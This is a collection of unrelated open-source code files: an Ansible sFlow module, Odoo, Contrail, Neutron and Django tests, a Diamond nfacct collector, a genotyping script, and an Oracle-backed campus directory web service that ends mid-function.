if int(self.collector_datagram_size) < 1024 or int(self.collector_datagram_size) > 8100:
self.module.fail_json(
msg="Error: collector_datagram_size is not ranges from 1024 to 8100.")
# check collector_udp_port ranges from 1 to 65535
if self.collector_udp_port:
if not self.collector_udp_port.isdigit():
self.module.fail_json(
msg="Error: collector_udp_port is not digit.")
if int(self.collector_udp_port) < 1 or int(self.collector_udp_port) > 65535:
self.module.fail_json(
msg="Error: collector_udp_port is not ranges from 1 to 65535.")
# check collector_description 1 to 255 case-sensitive characters
if self.collector_description:
if self.collector_description.count(" "):
self.module.fail_json(
msg="Error: collector_description should without spaces.")
if len(self.collector_description) < 1 or len(self.collector_description) > 255:
self.module.fail_json(
msg="Error: collector_description is not ranges from 1 to 255.")
# check sflow_interface
if self.sflow_interface:
intf_type = get_interface_type(self.sflow_interface)
if not intf_type:
self.module.fail_json(msg="Error: intf_type is invalid.")
if intf_type not in ['ge', '10ge', '25ge', '4x10ge', '40ge', '100ge', 'eth-trunk']:
self.module.fail_json(
msg="Error: interface %s is not support sFlow." % self.sflow_interface)
# check sample_collector
if self.sample_collector:
self.sample_collector.sort()
if self.sample_collector not in [["1"], ["2"], ["1", "2"]]:
self.module.fail_json(
msg="Error: sample_collector is invalid.")
# check sample_rate ranges from 1 to 4294967295
if self.sample_rate:
if not self.sample_rate.isdigit():
self.module.fail_json(
msg="Error: sample_rate is not digit.")
if int(self.sample_rate) < 1 or int(self.sample_rate) > 4294967295:
self.module.fail_json(
msg="Error: sample_rate is not ranges from 1 to 4294967295.")
# check sample_length ranges from 18 to 512
if self.sample_length:
if not self.sample_length.isdigit():
self.module.fail_json(
msg="Error: sample_rate is not digit.")
if int(self.sample_length) < 18 or int(self.sample_length) > 512:
self.module.fail_json(
msg="Error: sample_length is not ranges from 18 to 512.")
# check counter_collector
if self.counter_collector:
self.counter_collector.sort()
if self.counter_collector not in [["1"], ["2"], ["1", "2"]]:
self.module.fail_json(
msg="Error: counter_collector is invalid.")
# counter_interval ranges from 10 to 4294967295
if self.counter_interval:
if not self.counter_interval.isdigit():
self.module.fail_json(
msg="Error: counter_interval is not digit.")
if int(self.counter_interval) < 10 or int(self.counter_interval) > 4294967295:
self.module.fail_json(
msg="Error: sample_length is not ranges from 10 to 4294967295.")
# check rate_limit ranges from 100 to 1500 and check rate_limit_slot
if self.rate_limit:
if not self.rate_limit.isdigit():
self.module.fail_json(msg="Error: rate_limit is not digit.")
if int(self.rate_limit) < 100 or int(self.rate_limit) > 1500:
self.module.fail_json(
msg="Error: rate_limit is not ranges from 100 to 1500.")
if self.rate_limit_slot and not self.rate_limit_slot.isdigit():
self.module.fail_json(
msg="Error: rate_limit_slot is not digit.")
# check forward_enp_slot
if self.forward_enp_slot:
self.forward_enp_slot.lower()
if not self.forward_enp_slot.isdigit() and self.forward_enp_slot != "all":
self.module.fail_json(
msg="Error: forward_enp_slot is invalid.")
def get_proposed(self):
"""get proposed info"""
# base config
if self.agent_ip:
self.proposed["agent_ip"] = self.agent_ip
if self.source_ip:
self.proposed["source_ip"] = self.source_ip
if self.export_route:
self.proposed["export_route"] = self.export_route
if self.rate_limit:
self.proposed["rate_limit"] = self.rate_limit
self.proposed["rate_limit_slot"] = self.rate_limit_slot
if self.forward_enp_slot:
self.proposed["forward_enp_slot"] = self.forward_enp_slot
if self.collector_id:
self.proposed["collector_id"] = self.collector_id
if self.collector_ip:
self.proposed["collector_ip"] = self.collector_ip
self.proposed["collector_ip_vpn"] = self.collector_ip_vpn
if self.collector_datagram_size:
self.proposed[
"collector_datagram_size"] = self.collector_datagram_size
if self.collector_udp_port:
self.proposed["collector_udp_port"] = self.collector_udp_port
if self.collector_meth:
self.proposed["collector_meth"] = self.collector_meth
if self.collector_description:
self.proposed[
"collector_description"] = self.collector_description
# sample and counter config
if self.sflow_interface:
self.proposed["sflow_interface"] = self.sflow_interface
if self.sample_collector:
self.proposed["sample_collector"] = self.sample_collector
if self.sample_rate:
self.proposed["sample_rate"] = self.sample_rate
if self.sample_length:
self.proposed["sample_length"] = self.sample_length
if self.sample_direction:
self.proposed["sample_direction"] = self.sample_direction
if self.counter_collector:
self.proposed["counter_collector"] = self.counter_collector
if self.counter_interval:
self.proposed["counter_interval"] = self.counter_interval
self.proposed["state"] = self.state
def get_existing(self):
"""get existing info"""
if self.config:
if self.rate_limit:
self.existing["rate_limit"] = get_rate_limit(self.config)
if self.forward_enp_slot:
self.existing["forward_enp_slot"] = get_forward_enp(
self.config)
if not self.sflow_dict:
return
if self.agent_ip:
self.existing["agent"] = self.sflow_dict["agent"]
if self.source_ip:
self.existing["source"] = self.sflow_dict["source"]
if self.collector_id:
self.existing["collector"] = self.sflow_dict["collector"]
if self.export_route:
self.existing["export"] = self.sflow_dict["export"]
if self.sflow_interface:
self.existing["sampling"] = self.sflow_dict["sampling"]
self.existing["counter"] = self.sflow_dict["counter"]
def get_end_state(self):
"""get end state info"""
config = self.get_current_config()
if config:
if self.rate_limit:
self.end_state["rate_limit"] = get_rate_limit(config)
if self.forward_enp_slot:
self.end_state["forward_enp_slot"] = get_forward_enp(config)
sflow_dict = self.get_sflow_dict()
if not sflow_dict:
return
if self.agent_ip:
self.end_state["agent"] = sflow_dict["agent"]
if self.source_ip:
self.end_state["source"] = sflow_dict["source"]
if self.collector_id:
self.end_state["collector"] = sflow_dict["collector"]
if self.export_route:
self.end_state["export"] = sflow_dict["export"]
if self.sflow_interface:
self.end_state["sampling"] = sflow_dict["sampling"]
self.end_state["counter"] = sflow_dict["counter"]
def work(self):
"""worker"""
self.check_params()
self.sflow_dict = self.get_sflow_dict()
self.config = self.get_current_config()
self.get_existing()
self.get_proposed()
# deal present or absent
xml_str = ''
if self.export_route:
xml_str += self.config_export()
if self.agent_ip:
xml_str += self.config_agent()
if self.source_ip:
xml_str += self.config_source()
if self.state == "present":
if self.collector_id and self.collector_ip:
xml_str += self.config_collector()
if self.sflow_interface:
xml_str += self.config_sampling()
xml_str += self.config_counter()
else:
if self.sflow_interface:
xml_str += self.config_sampling()
xml_str += self.config_counter()
if self.collector_id:
xml_str += self.config_collector()
if self.rate_limit or self.forward_enp_slot:
self.config_assign()
if self.commands:
self.cli_load_config(self.commands)
self.changed = True
if xml_str:
self.netconf_load_config(xml_str)
self.changed = True
self.get_end_state()
self.results['changed'] = self.changed
self.results['proposed'] = self.proposed
self.results['existing'] = self.existing
self.results['end_state'] = self.end_state
if self.changed:
self.results['updates'] = self.updates_cmd
else:
self.results['updates'] = list()
self.module.exit_json(**self.results)
def main():
"""Module main"""
argument_spec = dict(
agent_ip=dict(required=False, type='str'),
source_ip=dict(required=False, type='str'),
export_route=dict(required=False, type='str',
choices=['enable', 'disable']),
rate_limit=dict(required=False, type='str'),
rate_limit_slot=dict(required=False, type='str'),
forward_enp_slot=dict(required=False, type='str'),
collector_id=dict(required=False, type='str', choices=['1', '2']),
collector_ip=dict(required=False, type='str'),
collector_ip_vpn=dict(required=False, type='str'),
collector_datagram_size=dict(required=False, type='str'),
collector_udp_port=dict(required=False, type='str'),
collector_meth=dict(required=False, type='str',
choices=['meth', 'enhanced']),
collector_description=dict(required=False, type='str'),
sflow_interface=dict(required=False, type='str'),
sample_collector=dict(required=False, type='list'),
sample_rate=dict(required=False, type='str'),
sample_length=dict(required=False, type='str'),
sample_direction=dict(required=False, type='str',
choices=['inbound', 'outbound', 'both']),
counter_collector=dict(required=False, type='list'),
counter_interval=dict(required=False, type='str'),
state=dict(required=False, default='present',
choices=['present', 'absent'])
)
argument_spec.update(ce_argument_spec)
module = Sflow(argument_spec)
module.work()
if __name__ == '__main__':
main()
|
kwailamchan/programming-languages | refs/heads/master | javascript/backbone/backbone-templates/backbone-fileupload/venvs/lib/python2.7/site-packages/django/contrib/localflavor/is_/__init__.py | 12133432 | |
helenst/django | refs/heads/master | django/conf/locale/it/__init__.py | 12133432 | |
jamesblunt/gunicorn | refs/heads/master | examples/frameworks/pylonstest/pylonstest/controllers/__init__.py | 12133432 | |
naousse/odoo | refs/heads/8.0 | addons/hr_timesheet_sheet/wizard/hr_timesheet_current.py | 381 | # -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2010 Tiny SPRL (<http://tiny.be>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
import time
from openerp.osv import fields, osv
from openerp.tools.translate import _
class hr_timesheet_current_open(osv.osv_memory):
_name = 'hr.timesheet.current.open'
_description = 'hr.timesheet.current.open'
def open_timesheet(self, cr, uid, ids, context=None):
ts = self.pool.get('hr_timesheet_sheet.sheet')
if context is None:
context = {}
view_type = 'form,tree'
user_ids = self.pool.get('hr.employee').search(cr, uid, [('user_id','=',uid)], context=context)
if not len(user_ids):
raise osv.except_osv(_('Error!'), _('Please create an employee and associate it with this user.'))
ids = ts.search(cr, uid, [('user_id','=',uid),('state','in',('draft','new')),('date_from','<=',time.strftime('%Y-%m-%d')), ('date_to','>=',time.strftime('%Y-%m-%d'))], context=context)
if len(ids) > 1:
view_type = 'tree,form'
domain = "[('id','in',["+','.join(map(str, ids))+"]),('user_id', '=', uid)]"
elif len(ids)==1:
domain = "[('user_id', '=', uid)]"
else:
domain = "[('user_id', '=', uid)]"
value = {
'domain': domain,
'name': _('Open Timesheet'),
'view_type': 'form',
'view_mode': view_type,
'res_model': 'hr_timesheet_sheet.sheet',
'view_id': False,
'type': 'ir.actions.act_window'
}
if len(ids) == 1:
value['res_id'] = ids[0]
return value
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
|
aranjan7/contrail-controller-aranjan | refs/heads/master | src/config/api-server/tests/test_askip.py | 7 | #
# Copyright (c) 2013 Juniper Networks, Inc. All rights reserved.
#
from vnc_api.vnc_api import *
import uuid
def all(ip='10.84.13.34', port=8082, domain_name='my-domain',
proj_name='my-proj', subnet='192.168.1.0', prefix=24, vn_name='my-fe',
compute_node='a2s3.contrail.juniper.net'):
vnc_lib = VncApi(username='admin', password='contrail123',
tenant_name='admin', api_server_host=ip,
api_server_port=port)
domain = Domain(domain_name)
vnc_lib.domain_create(domain)
print 'Created domain'
project = Project(proj_name, domain)
vnc_lib.project_create(project)
print 'Created Project'
ipam = NetworkIpam('default-network-ipam', project, IpamType("dhcp"))
vnc_lib.network_ipam_create(ipam)
print 'Created network ipam'
ipam = vnc_lib.network_ipam_read(fq_name=[domain_name, proj_name,
'default-network-ipam'])
print 'Read network ipam'
ipam_sn_1 = IpamSubnetType(subnet=SubnetType(subnet, prefix))
vn = VirtualNetwork(vn_name, project)
vn.add_network_ipam(ipam, VnSubnetsType([ipam_sn_1]))
vnc_lib.virtual_network_create(vn)
net_obj = vnc_lib.virtual_network_read(id=vn.uuid)
ip_obj = InstanceIp(name=str(uuid.uuid4()))
ip_obj.uuid = ip_obj.name
print 'Created Instance IP object ', ip_obj.uuid
vrouter_obj = VirtualRouter(compute_node)
vnc_lib.virtual_router_create(vrouter_obj)
print 'Created Virtual Router object'
vm_inst_obj = VirtualMachine(str(uuid.uuid4()))
vm_inst_obj.uuid = vm_inst_obj.name
vnc_lib.virtual_machine_create(vm_inst_obj)
vrouter_obj.add_virtual_machine(vm_inst_obj)
vnc_lib.virtual_router_update(vrouter_obj)
id_perms = IdPermsType(enable=True)
port_obj = VirtualMachineInterface(
str(uuid.uuid4()), vm_inst_obj, id_perms=id_perms)
port_obj.uuid = port_obj.name
port_obj.set_virtual_network(vn)
ip_obj.set_virtual_machine_interface(port_obj)
ip_obj.set_virtual_network(net_obj)
port_id = vnc_lib.virtual_machine_interface_create(port_obj)
print 'Allocating an IP address'
ip_id = vnc_lib.instance_ip_create(ip_obj)
ip_obj = vnc_lib.instance_ip_read(id=ip_id)
ip_addr = ip_obj.get_instance_ip_address()
print ' got ', ip_addr
print
print 'Try to reserve above address ... should fail'
try:
ip_obj.set_instance_ip_address(ip_addr)
ip_id = vnc_lib.instance_ip_create(ip_obj)
except:
print ' Failed to reserver already allocated IP address. Test passed'
askip = '192.168.1.93'
print
print 'Try to reserve unassigned address %s ... should succeed' % (askip)
ip_obj.set_instance_ip_address(askip)
ip_id = vnc_lib.instance_ip_create(ip_obj)
ip_obj = vnc_lib.instance_ip_read(id=ip_id)
ip_addr = ip_obj.get_instance_ip_address()
if ip_addr == askip:
print ' Test passed!'
else:
print ' Test failed! got %s' % (ip_addr)
if __name__ == '__main__':
all()
|
sdroege/openwebrtc | refs/heads/master | bindings/java/type_registry.py | 1 | # Copyright (c) 2014, Ericsson AB. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without modification,
# are permitted provided that the following conditions are met:
#
# 1. Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
#
# 2. Redistributions in binary form must reproduce the above copyright notice, this
# list of conditions and the following disclaimer in the documentation and/or other
# materials provided with the distribution.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED.
# IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT,
# INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
# NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
# PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,
# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY
# OF SUCH DAMAGE.
import pprint
from collections import defaultdict
class TypeRegistry:
def __init__(self):
self.types=[]
self.by_gir_type = defaultdict(set)
self.by_c_type = defaultdict(set)
self.array_by_gir_type = defaultdict(set)
self.array_by_c_type = defaultdict(set)
self.enum_aliases = {}
def _register(self, typ):
self.types.append(typ)
if typ.is_array:
if typ.gir_type:
self.array_by_gir_type[typ.gir_type] |= set([typ])
if typ.c_type:
self.array_by_c_type[typ.c_type] |= set([typ])
else:
if typ.gir_type:
self.by_gir_type[typ.gir_type] |= set([typ])
if typ.c_type:
self.by_c_type[typ.c_type] |= set([typ])
def register(self, typ):
try:
[self._register(t) for t in typ]
except TypeError:
self._register(typ)
def register_enum_aliases(self, aliases):
self.enum_aliases.update(aliases)
def lookup(self, gir_type = None, c_type = None, is_array=False):
girs = None;
cs = None;
if is_array:
girs = self.array_by_gir_type[gir_type]
cs = self.array_by_c_type[c_type]
else:
girs = self.by_gir_type[gir_type]
cs = self.by_c_type[c_type]
if not girs and len(cs) == 1:
return next(iter(cs))
elif not cs and len(girs) == 1:
return next(iter(girs))
result = girs & cs
if len(result) == 1:
return next(iter(result))
enum_alias = self.enum_aliases.get(gir_type)
if enum_alias is not None:
return self.lookup(enum_alias, c_type)
if len(girs):
return max(iter(girs))
raise LookupError("type lookup failed (gir_type=%s, c_type=%s)" % (gir_type, c_type))
class TypeTransform(object):
def __init__(self,
declarations = None,
conversion = None,
cleanup = None,
):
self.declarations = declarations or []
self.conversion = conversion or []
self.cleanup = cleanup or []
class GirMetaType(object):
gir_type = None
java_type = None
jni_type = None
c_type = None
java_signature = None
is_container = False
is_array = False
is_length_param = False
has_local_ref = False
def __new__(cls):
return type(cls.__name__, (cls,), {
'__new__': object.__new__,
})
def __init__(self, name, transfer_ownership=False, allow_none=False):
self.name = name
self.transfer_ownership = transfer_ownership
self.allow_none = allow_none
if name:
self.c_name = 'c_' + name
self.jni_name = 'j_' + name
@property
def object_type(self):
return self.java_type
@property
def object_full_type(self):
return self.java_full_class
def transform_to_c(self):
raise AssertionError(self.__class__.__name__ + '.transform_to_c is not implemented')
def transform_to_jni(self):
raise AssertionError(self.__class__.__name__ + '.transform_to_jni is not implemented')
|
gotomypc/scikit-learn | refs/heads/master | sklearn/utils/tests/test_fast_dict.py | 252 | """ Test fast_dict.
"""
import numpy as np
from nose.tools import assert_equal
from sklearn.utils.fast_dict import IntFloatDict, argmin
from sklearn.externals.six.moves import xrange
def test_int_float_dict():
rng = np.random.RandomState(0)
keys = np.unique(rng.randint(100, size=10).astype(np.intp))
values = rng.rand(len(keys))
d = IntFloatDict(keys, values)
for key, value in zip(keys, values):
assert_equal(d[key], value)
assert_equal(len(d), len(keys))
d.append(120, 3.)
assert_equal(d[120], 3.0)
assert_equal(len(d), len(keys) + 1)
for i in xrange(2000):
d.append(i + 1000, 4.0)
assert_equal(d[1100], 4.0)
def test_int_float_dict_argmin():
# Test the argmin implementation on the IntFloatDict
keys = np.arange(100, dtype=np.intp)
values = np.arange(100, dtype=np.float)
d = IntFloatDict(keys, values)
assert_equal(argmin(d), (0, 0))
|
sajuptpm/neutron-ipam | refs/heads/stable/icehouse | neutron/tests/unit/hyperv/test_hyperv_neutron_agent.py | 4 | # vim: tabstop=4 shiftwidth=4 softtabstop=4
# Copyright 2013 Cloudbase Solutions SRL
# Copyright 2013 Pedro Navarro Perez
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
Unit tests for Windows Hyper-V virtual switch neutron driver
"""
import mock
from oslo.config import cfg
from neutron.plugins.hyperv.agent import hyperv_neutron_agent
from neutron.plugins.hyperv.agent import utilsfactory
from neutron.tests import base
cfg.CONF.import_opt('enable_metrics_collection',
'neutron.plugins.hyperv.agent.hyperv_neutron_agent',
'AGENT')
class TestHyperVNeutronAgent(base.BaseTestCase):
_FAKE_PORT_ID = 'fake_port_id'
def setUp(self):
super(TestHyperVNeutronAgent, self).setUp()
# Avoid rpc initialization for unit tests
cfg.CONF.set_override('rpc_backend',
'neutron.openstack.common.rpc.impl_fake')
utilsfactory._get_windows_version = mock.MagicMock(
return_value='6.2.0')
class MockFixedIntervalLoopingCall(object):
def __init__(self, f):
self.f = f
def start(self, interval=0):
self.f()
mock.patch('neutron.openstack.common.loopingcall.'
'FixedIntervalLoopingCall',
new=MockFixedIntervalLoopingCall)
cfg.CONF.set_default('firewall_driver',
'neutron.agent.firewall.NoopFirewallDriver',
group='SECURITYGROUP')
self.agent = hyperv_neutron_agent.HyperVNeutronAgent()
self.agent.plugin_rpc = mock.Mock()
self.agent.sec_groups_agent = mock.MagicMock()
self.agent.context = mock.Mock()
self.agent.agent_id = mock.Mock()
fake_agent_state = {
'binary': 'neutron-hyperv-agent',
'host': 'fake_host_name',
'topic': 'N/A',
'configurations': {'vswitch_mappings': ['*:MyVirtualSwitch']},
'agent_type': 'HyperV agent',
'start_flag': True}
self.agent_state = fake_agent_state
def test_port_bound_enable_metrics(self):
cfg.CONF.set_override('enable_metrics_collection', True, 'AGENT')
self._test_port_bound(True)
def test_port_bound_no_metrics(self):
cfg.CONF.set_override('enable_metrics_collection', False, 'AGENT')
self._test_port_bound(False)
def _test_port_bound(self, enable_metrics):
port = mock.MagicMock()
mock_enable_metrics = mock.MagicMock()
net_uuid = 'my-net-uuid'
with mock.patch.multiple(
self.agent._utils,
connect_vnic_to_vswitch=mock.MagicMock(),
set_vswitch_port_vlan_id=mock.MagicMock(),
enable_port_metrics_collection=mock_enable_metrics):
self.agent._port_bound(port, net_uuid, 'vlan', None, None)
self.assertEqual(enable_metrics, mock_enable_metrics.called)
def test_port_unbound(self):
map = {
'network_type': 'vlan',
'vswitch_name': 'fake-vswitch',
'ports': [],
'vlan_id': 1}
net_uuid = 'my-net-uuid'
network_vswitch_map = (net_uuid, map)
with mock.patch.object(self.agent,
'_get_network_vswitch_map_by_port_id',
return_value=network_vswitch_map):
with mock.patch.object(
self.agent._utils,
'disconnect_switch_port'):
self.agent._port_unbound(net_uuid)
def test_port_enable_control_metrics_ok(self):
cfg.CONF.set_override('enable_metrics_collection', True, 'AGENT')
self.agent._port_metric_retries[self._FAKE_PORT_ID] = (
cfg.CONF.AGENT.metrics_max_retries)
with mock.patch.multiple(self.agent._utils,
can_enable_control_metrics=mock.MagicMock(),
enable_control_metrics=mock.MagicMock()):
self.agent._utils.can_enable_control_metrics.return_value = True
self.agent._port_enable_control_metrics()
self.agent._utils.enable_control_metrics.assert_called_with(
self._FAKE_PORT_ID)
self.assertNotIn(self._FAKE_PORT_ID, self.agent._port_metric_retries)
def test_port_enable_control_metrics_maxed(self):
cfg.CONF.set_override('enable_metrics_collection', True, 'AGENT')
cfg.CONF.set_override('metrics_max_retries', 3, 'AGENT')
self.agent._port_metric_retries[self._FAKE_PORT_ID] = (
cfg.CONF.AGENT.metrics_max_retries)
with mock.patch.multiple(self.agent._utils,
can_enable_control_metrics=mock.MagicMock(),
enable_control_metrics=mock.MagicMock()):
self.agent._utils.can_enable_control_metrics.return_value = False
for i in range(cfg.CONF.AGENT.metrics_max_retries + 1):
self.assertIn(self._FAKE_PORT_ID,
self.agent._port_metric_retries)
self.agent._port_enable_control_metrics()
self.assertNotIn(self._FAKE_PORT_ID, self.agent._port_metric_retries)
def test_treat_devices_added_returns_true_for_missing_device(self):
attrs = {'get_device_details.side_effect': Exception()}
self.agent.plugin_rpc.configure_mock(**attrs)
self.assertTrue(self.agent._treat_devices_added([{}]))
def mock_treat_devices_added(self, details, func_name):
"""Mock treat devices added.
:param details: the details to return for the device
:param func_name: the function that should be called
:returns: whether the named function was called
"""
attrs = {'get_device_details.return_value': details}
self.agent.plugin_rpc.configure_mock(**attrs)
with mock.patch.object(self.agent, func_name) as func:
self.assertFalse(self.agent._treat_devices_added([{}]))
return func.called
def test_treat_devices_added_updates_known_port(self):
details = mock.MagicMock()
details.__contains__.side_effect = lambda x: True
with mock.patch.object(self.agent.plugin_rpc,
"update_device_up") as func:
self.assertTrue(self.mock_treat_devices_added(details,
'_treat_vif_port'))
self.assertTrue(func.called)
def test_treat_devices_added_missing_port_id(self):
details = mock.MagicMock()
details.__contains__.side_effect = lambda x: False
with mock.patch.object(self.agent.plugin_rpc,
"update_device_up") as func:
self.assertFalse(self.mock_treat_devices_added(details,
'_treat_vif_port'))
self.assertFalse(func.called)
def test_treat_devices_removed_returns_true_for_missing_device(self):
attrs = {'update_device_down.side_effect': Exception()}
self.agent.plugin_rpc.configure_mock(**attrs)
self.assertTrue(self.agent._treat_devices_removed([{}]))
def mock_treat_devices_removed(self, port_exists):
details = dict(exists=port_exists)
attrs = {'update_device_down.return_value': details}
self.agent.plugin_rpc.configure_mock(**attrs)
with mock.patch.object(self.agent, '_port_unbound') as func:
self.assertFalse(self.agent._treat_devices_removed([{}]))
self.assertEqual(func.called, not port_exists)
def test_treat_devices_removed_unbinds_port(self):
self.mock_treat_devices_removed(False)
def test_treat_devices_removed_ignores_missing_port(self):
self.mock_treat_devices_removed(False)
def test_report_state(self):
with mock.patch.object(self.agent.state_rpc,
"report_state") as report_st:
self.agent._report_state()
report_st.assert_called_with(self.agent.context,
self.agent.agent_state)
self.assertNotIn("start_flag", self.agent.agent_state)
def test_main(self):
with mock.patch.object(hyperv_neutron_agent,
'HyperVNeutronAgent') as plugin:
with mock.patch.object(hyperv_neutron_agent.cfg, 'CONF') as cfg:
with mock.patch('eventlet.monkey_patch') as eventlet:
with mock.patch.object(
hyperv_neutron_agent,
'logging_config') as logging_config:
hyperv_neutron_agent.main()
self.assertTrue(cfg.called)
self.assertTrue(eventlet.called)
self.assertTrue(logging_config.setup_logging.called)
plugin.assert_has_calls([mock.call().daemon_loop()])
|
mkusz/invoke | refs/heads/master | tests/_support/subcollection_task_name.py | 2 | from invoke import task
@task(name='explicit_name')
def implicit_name(ctx):
pass
|
TAKEALOT/Diamond | refs/heads/master | src/collectors/nfacct/nfacct.py | 60 | # coding=utf-8
"""
Collect counters from Netfilter accounting
#### Dependencies
* [nfacct](http://www.netfilter.org/projects/nfacct/)
"""
import diamond.collector
from subprocess import Popen, PIPE
import re
from diamond.collector import str_to_bool
class NetfilterAccountingCollector(diamond.collector.Collector):
def get_default_config_help(self):
config_help = (
super(NetfilterAccountingCollector, self).get_default_config_help())
config_help.update({
'bin': 'The path to the smartctl binary',
'reset': 'Reset counters after collecting',
'use_sudo': 'Use sudo?',
'sudo_cmd': 'Path to sudo',
})
return config_help
def get_default_config(self):
"""
Returns default configuration options.
"""
config = super(NetfilterAccountingCollector, self).get_default_config()
config.update({
'path': 'nfacct',
'bin': 'nfacct',
'use_sudo': False,
'reset': True,
'sudo_cmd': '/usr/bin/sudo',
'method': 'Threaded'
})
return config
def collect(self):
"""
Collect and publish netfilter counters
"""
cmd = [self.config['bin'], "list"]
if str_to_bool(self.config['reset']):
cmd.append("reset")
if str_to_bool(self.config['use_sudo']):
cmd.insert(0, self.config['sudo_cmd'])
# We avoid use of the XML format to mtaintain compatbility with older
# versions of nfacct and also to avoid the bug where pkts and bytes were
# flipped
# Each line is of the format:
# { pkts = 00000000000001121700, bytes = 00000000000587037355 } = ipv4;
matcher = re.compile("{ pkts = (.*), bytes = (.*) } = (.*);")
lines = Popen(cmd, stdout=PIPE).communicate()[0].strip().splitlines()
for line in lines:
matches = re.match(matcher, line)
if matches:
num_packets = int(matches.group(1))
num_bytes = int(matches.group(2))
name = matches.group(3)
self.publish(name + ".pkts", num_packets)
self.publish(name + ".bytes", num_bytes)
|
ListerLab/TEPID | refs/heads/master | Scripts/genotype.py | 1 | #! /usr/bin/env python
from argparse import ArgumentParser
parser = ArgumentParser(description='Genotype TE insertions')
group = parser.add_mutually_exclusive_group()
group.add_argument('-d', '--deletions', help='run on deletions', action='store_true', required=False, default=False)
group.add_argument('-i', '--insertions', help='run on insertions', action='store_true', required=False, default=False)
parser.add_argument('-a', '--ambiguous', help='ambiguous TE variants filename', required=True)
parser.add_argument('-m', '--merged', help='merged TE variants filename', required=True)
parser.add_argument('-s', '--samples', help='all sample names', required=True)
parser.add_argument('-r', '--reference', help='reference sample name', required=True)
options = parser.parse_args()
if options.deletions is True:
val = 5 # number of columns
elif options.insertions is True:
val = 7
else:
raise Exception("Incorrect arguments")
def create_names_list(inf):
names = []
with open(inf, 'r') as infile:
for line in infile:
line = line.rsplit()
names.append(line[0])
return names
def read_files_to_dict(f, val):
d = {}
with open(f, 'r') as infile:
for line in infile:
line = line.rsplit()
coords = '|'.join(line[:val]) # key common to ambiguous and merged insertions files
d[coords] = line[-1].split(',') # accession names
return d
def invert_samples(samples, all_accessions, reference):
i = [reference]
for accession in all_accessions:
if accession not in samples:
i.append(accession)
return i
def genotype(merged, ambiguous, all_accessions, reference):
for key, value in merged.items():
opposite_accessions = invert_samples(value, all_accessions, reference)
try:
ambiguous[key]
except KeyError:
ambiguous_accessions = []
else:
ambiguous_accessions = ambiguous[key]
for i in opposite_accessions:
if i in ambiguous_accessions:
opposite_accessions.remove(i)
data = key.split('|')
te = data[-1]
coords = data[:-1]
print("\t".join(coords)+"\t"+te+"\t"+",".join(value)+"\t"+",".join(opposite_accessions))
accession = create_names_list(options.samples)
merged = read_files_to_dict(options.merged, val)
ambiguous = read_files_to_dict(options.ambiguous, val)
genotype(merged, ambiguous, accession, options.reference) |
gunchleoc/django | refs/heads/master | tests/invalid_models_tests/test_backend_specific.py | 191 | # -*- encoding: utf-8 -*-
from __future__ import unicode_literals
from django.core.checks import Error
from django.db import connections, models
from django.test import mock
from .base import IsolatedModelsTestCase
def dummy_allow_migrate(db, app_label, **hints):
# Prevent checks from being run on the 'other' database, which doesn't have
# its check_field() method mocked in the test.
return db == 'default'
class BackendSpecificChecksTests(IsolatedModelsTestCase):
@mock.patch('django.db.models.fields.router.allow_migrate', new=dummy_allow_migrate)
def test_check_field(self):
""" Test if backend specific checks are performed. """
error = Error('an error', hint=None)
class Model(models.Model):
field = models.IntegerField()
field = Model._meta.get_field('field')
with mock.patch.object(connections['default'].validation, 'check_field', return_value=[error]):
errors = field.check()
self.assertEqual(errors, [error])
|
uwosh/Campus_Directory_web_service | refs/heads/master | CampusDirectoryZEM001VALUOVWCX.py | 1 | # Web service for campus directory project
import cx_Oracle
import xmlrpclib
Randy_Loch = '192.168.0.1'
Kim_Nguyen_G5 = '192.168.0.1'
def CampusDirectoryZEM001VALUOVWCX (self, org_unit='None'):
request = self.REQUEST
RESPONSE = request.RESPONSE
remote_addr = request.REMOTE_ADDR
if remote_addr in [Randy_Loch, Kim_Nguyen_G5, '127.0.0.1', ]:
file = open('/opt/Plone-2.5.5/zeocluster/client1/Extensions/Oracle_Database_Connection_Campus_Directory.txt', 'r')
for line in file.readlines():
if line <> "" and not line.startswith('#'):
connString = line
file.close()
connection = cx_Oracle.connect(connString)
cursor = connection.cursor()
if org_unit == 'None':
cursor.execute("""select * from PS_ZEM001VALUOVW """)
else:
cursor.execute("""select * from PS_ZEM001VALUOVW where z_univ_org = :arg1""", arg1=org_unit)
retlist = []
for c1, c2 in cursor:
retlist.append([c1, c2,])
myMarshaller = xmlrpclib.Marshaller()
